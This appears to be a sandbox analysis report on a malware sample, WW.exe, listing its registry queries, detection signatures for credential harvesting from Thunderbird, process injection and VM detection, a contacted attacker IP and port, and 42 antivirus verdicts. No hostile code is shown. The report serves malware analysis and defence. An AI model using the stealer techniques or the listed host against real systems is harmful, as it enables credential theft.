RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: NewProduct 1.00 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Aug. 13, 2022, 8:14 p.m.	key_handle: 0x0000029c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1

Harvests credentials from local email clients (1 event)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini

Network activity contains more than one unique useragent (3 events)

process	iexplore.exe	useragent
process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
process	kukurzka9000.exe	useragent	mozzzzzzzzzzz

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2480 resumed a thread in remote process 2552
Process injection	Process 2480 resumed a thread in remote process 2764
Process injection	Process 2480 resumed a thread in remote process 2800
NtResumeThread Aug. 13, 2022, 8:13 p.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 2552	1	0	0
NtResumeThread Aug. 13, 2022, 8:13 p.m.	thread_handle: 0x00000594 suspend_count: 1 process_identifier: 2764	1	0	0
NtResumeThread Aug. 13, 2022, 8:13 p.m.	thread_handle: 0x000005a8 suspend_count: 1 process_identifier: 2800	1	0	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Aug. 13, 2022, 8:37 p.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

62.204.41.144:14096

File has been identified by 42 AntiVirus engines on VirusTotal as malicious (42 events)

Bkav	W32.AIDetect.malware2
MicroWorld-eScan	Trojan.GenericKD.61246934
FireEye	Trojan.GenericKD.61246934
CAT-QuickHeal	TrojanSpy.Stealer
ALYac	Gen:Variant.Graftor.540662
Cylance	Unsafe
VIPRE	Trojan.GenericKD.61246934
K7AntiVirus	Riskware ( 0040eff71 )
K7GW	Riskware ( 0040eff71 )
Cybereason	malicious.9d71cc
BitDefenderTheta	Gen:NN.ZelphiF.34592.yHW@aa4TxVaO
Cyren	W32/Kryptik.HGY.gen!Eldorado
Symantec	Trojan.Whispergate
Elastic	malicious (high confidence)
ESET-NOD32	multiple detections
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Trojan.GenericKD.61246934
NANO-Antivirus	Trojan.Win32.Stealer.jrisng
Cynet	Malicious (score: 99)
SUPERAntiSpyware	Trojan.Agent/Gen-Dropper
Avast	Win32:PWSX-gen [Trj]
Emsisoft	Trojan.GenericKD.61246934 (B)
DrWeb	Trojan.PWS.Steam.32011
SentinelOne	Static AI - Malicious PE
Sophos	Generic ML PUA (PUA)
APEX	Malicious
Webroot	W32.Trojan.Gen
Avira	TR/Crypt.Agent.mixwr
MAX	malware (ai score=89)
Antiy-AVL	Trojan/Generic.ASMalwS.8153
Kingsoft	Win32.Troj.Banker.(kcloud)
Microsoft	Ransom:Win32/StopCrypt.SLK!MTB
Gridinsoft	Trojan.Win32.CoinMiner.vb!s8
GData	Gen:Variant.Graftor.540662
Google	Detected
VBA32	BScope.Trojan.Wacatac
Malwarebytes	Spyware.RedLineStealer
Ikarus	Trojan.Win32.Crypt
MaxSecure	Trojan-Ransom.Win32.Crypmod.zfq
AVG	Win32:PWSX-gen [Trj]
CrowdStrike	win/malicious_confidence_70% (W)

WW.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All